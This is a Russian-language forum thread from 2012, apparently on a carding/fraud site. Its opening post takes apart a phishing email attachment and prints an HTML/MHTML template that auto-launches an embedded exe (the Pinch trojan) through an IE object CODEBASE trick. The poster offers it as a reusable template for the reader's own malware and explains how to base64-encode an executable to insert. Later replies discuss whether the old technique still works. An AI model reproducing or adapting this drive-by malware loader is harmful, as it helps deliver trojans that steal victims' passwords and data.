1
  1. Этот сайт использует файлы cookie. Продолжая пользоваться данным сайтом, Вы соглашаетесь на использование нами Ваших файлов cookie. Узнать больше.
Приветствуем вас,Гость, на форуме IFUD.WS. Обязательно рекомендуется к прочтению правила форума http://ifud.ws/threads/obnovleno-pravila-foruma.7759

Запуск Ехе-файла Через Html Страницу

Тема в разделе "Чужие", создана пользователем Viclug, 25 окт 2012.

  1. TopicStarter Overlay
    Viclug

    Viclug Gott mit Uns!

    Регистрация:
    22 июн 2012
    Сообщения:
    620
    Симпатии:
    468
    Сидел я в интернет-клубе, ползал по просторам интернета и решил проверить свой почтовый ящик. Там оказалось недавно пришедшее письмо странного содержания. В начале втирали про что-то на русско-английском языке, а потом такая фраза: "Я слышал, что ты болеешь. Выздоравливай скорее!". Примерно так. Что за чудо, я не болел уже давно. К письму был прикреплен архив, защищенный паролем. А пароль был в тексте письма: docs. В письме говорилось, что в архиве лежат пароли боссов. Опять вирусы, сказал я и принялся обезвреживать бомбу =)

    Пароль к архиву подошел (так а тож), и передо мной предстал ни вчем не повинный html файлик объемом всего в 15 килобайт. Ну естественно запускать я его не стал, а нажал "F4" (в Total Commander'e). Откылся Блокнот, с содержанием файла docs.html.

    Код:
    MIME-Version: 1.0
    Content-Location:file:///Pinch.exe
    Content-Transfer-Encoding: base64
     
     
    ***91;BINARY TEXT VIRUS***93;
     
    <title>Welcome - Home</title>
    <body bgcolor=black scroll=no>
    <script>
    function malware()
    {
    s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));
    path=unescape(path);
    document.write( ' <title>Welcome - Home</title>
    <body scroll=no bgcolor=black><FONT face="Comic Sans MS" color=red style="position:absolute;top:20;left:90;z-index:100; font-size:2cm;">
    Sorry, Error On This Page! Please Open With Internet Explorer</center>
    <object style="cursor:cross-hair" alt="Sorry, Error On This Page! Please Open With Internet Explorer" classid="clsid:66666666-6666-6666-6666" CODEBASE="mhtml:'+path+'\\docs.html!file:///Pinch.exe">
    </object>')
    }
    setTimeout("malware()",150)
    </script>
    
    Строка [BINARY TEXT VIRUS] означает, что на этом месте был закодирован exe файл вируса, вставлять я его не стал, уж слишком много места займет. Если тебе важен оригинал вируса, то его можно без проблем скачать от сюда.

    Перед вами макет автозапуска виря из html файла. Его можно использовать и для ваших творений =) Просто замените текст [BINARY TEXT VIRUS] на ваш код exe файла. А код можно легко получить следующим образом...


    Зайдите в Outlook Express и нажмите "Написать новое сообщение", в открывшемся окне щелкните "Вставка" -> "Вложение файла". Теперь "Файл" -> "Сохранить как...". После сохранения письма, его нужно открыть в Текстовом редакторе и вырезать тот самый код exe файла. И всё!

    P.S. За всю мою жизнь, в интернете я подцепил всего лишь ОДНОГО! виря и то не я его нашел, а он меня нашел, и назывался MSBlaster (использующий уязвимость в WinXP - DCOM). Thats All.

    Сайт автора: _Please login or register to view links
     
    • Like Like x 4
    Метки:
  2. Enigma

    Enigma Гость

    Интересно,однако.Попробую.
     
  3. Kelvin

    Kelvin Sin Cera

    Регистрация:
    10 май 2012
    Сообщения:
    517
    Симпатии:
    390
    А можно пример? Ато не очень понятно что копировать...??
    --- добавлено: 26 окт 2012 в 01:00 ---
    Ссылки нет(((
     
  4. Херка-тян

    Херка-тян

    Регистрация:
    28 июл 2012
    Сообщения:
    220
    Симпатии:
    249
    Этот способ актуален сейчас, ты пробовал? Первые упоминания этой статьи с 2005 года.
     
  5. Kelvin

    Kelvin Sin Cera

    Регистрация:
    10 май 2012
    Сообщения:
    517
    Симпатии:
    390
    Да, мне тоже кажется что этот способ не актуален
     
  6. TopicStarter Overlay
    Viclug

    Viclug Gott mit Uns!

    Регистрация:
    22 июн 2012
    Сообщения:
    620
    Симпатии:
    468
    Может стоит сначала попробовать?
     
  7. ResH

    ResH Команда форума

    Регистрация:
    26 июл 2012
    Сообщения:
    1.675
    Симпатии:
    2.266
    думаю ты просто потеряешь время
    сам подумай если эта тулза работало бы то люди не тратили бы пару кусков баксов на связок
    думаю и с скрипта все ясно
    этот скрипт предназначен для загрузки пинч , а пинча уже похоронили 5-6 лет назад как и этот скрипт
    помню еще был такой скрипт на VBS который предназначался для Opera 0.0000001 :D
     
  8. asyapak

    asyapak Гость

    да конечно не актуален давно! откуда такие археологи берутся?
    Content-Location:file:///Pinch.exe
    это пинч , как раз в те далёкие 2005-2007 он и распространялся и был самый актуальный на тот момент вирус
    автор пинча coban3k
    =========
    rrr_rrr опередил :D
     
  9. TopicStarter Overlay
    Viclug

    Viclug Gott mit Uns!

    Регистрация:
    22 июн 2012
    Сообщения:
    620
    Симпатии:
    468
    Помните. Все новое это хорошо забытое старое при наличии прямых рук и способности думать.
     
  10. Kelvin

    Kelvin Sin Cera

    Регистрация:
    10 май 2012
    Сообщения:
    517
    Симпатии:
    390
    Не знаю, у меня нечего не получилось. Friz если у тебя получилось то выложи пожалуйста пример)))
     
  11. Iva1

    Iva1 Гость

    Археология)
     

Поделиться этой страницей

Загрузка...